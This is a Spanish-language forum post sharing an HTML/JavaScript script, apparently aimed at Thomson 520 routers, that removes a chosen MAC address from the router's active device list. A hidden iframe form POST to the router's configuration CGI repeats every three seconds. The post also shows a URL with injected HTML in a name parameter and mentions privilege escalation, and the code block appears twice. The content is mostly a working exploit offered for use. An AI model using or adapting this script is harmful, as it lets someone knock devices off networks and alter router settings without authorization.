Autor
El funcionamiento es muy básico; el portal del router antes mencionado permite depurar la lista de dispositivos activos manualmente, de forma que lo que hace el siguiente script es borrar el dispositivo con la mac proporcionada por el usuario mediante la acción de un método post secundado por un iframe, hasta ahora el único modelo del cual he podido confirmar su funcionamiento es el mencionado en el título del post.
cualquier duda quedo a su disposición.
Código:
<html>
<head>
<script>
var hw="";
var addrss="";
var timeR="";
function f(){
if (hw==""){
hw=prompt("Proporcionar su HW","00:00:00:00:00:00");
addrss=prompt("Proporcionar la ip`del router"," 192.168.1.254");
}
document.getElementById('31').value=hw;
document.getElementById('foo').action="http://"+addrss+"/cgi/b/_dev_/cfg/?be=0&l0=3&l1=0&name=&key="+hw;
document.getElementById('foo').submit();
}
</script>
</head>
<body onLoad="setInterval('f()',3000);" bgcolor=f0f0f0>
<h1>Clean the house<br>Thomson 520</h1>
<h3>By preth00nker</h3>
implementar cleanning de historial + autentificación
http://3.2.1.99/cgi/b/_dev_/ov/?be=0&l0=3&l1=0&name=<h1>Unknown-00-18-3f-16-19-49&key=00:18:3f:16:19:49
Escalando privilegios
<form METHOD=POST action="" target="a" id=foo>
<input name=0 value="22" type=hidden >
<input name=1 value="" type=hidden >
<input name=31 value="" type=hidden id=31>
<input name=32 value="hostname" type=hidden>
<input name=33 value="0" type=hidden>
</form>
<iframe src="" name="a" width=0 height=0>
</body>
</html>
<head>
<script>
var hw="";
var addrss="";
var timeR="";
function f(){
if (hw==""){
hw=prompt("Proporcionar su HW","00:00:00:00:00:00");
addrss=prompt("Proporcionar la ip`del router"," 192.168.1.254");
}
document.getElementById('31').value=hw;
document.getElementById('foo').action="http://"+addrss+"/cgi/b/_dev_/cfg/?be=0&l0=3&l1=0&name=&key="+hw;
document.getElementById('foo').submit();
}
</script>
</head>
<body onLoad="setInterval('f()',3000);" bgcolor=f0f0f0>
<h1>Clean the house<br>Thomson 520</h1>
<h3>By preth00nker</h3>
implementar cleanning de historial + autentificación
http://3.2.1.99/cgi/b/_dev_/ov/?be=0&l0=3&l1=0&name=<h1>Unknown-00-18-3f-16-19-49&key=00:18:3f:16:19:49
Escalando privilegios
<form METHOD=POST action="" target="a" id=foo>
<input name=0 value="22" type=hidden >
<input name=1 value="" type=hidden >
<input name=31 value="" type=hidden id=31>
<input name=32 value="hostname" type=hidden>
<input name=33 value="0" type=hidden>
</form>
<iframe src="" name="a" width=0 height=0>
</body>
</html>
un saludo!
En línea
)
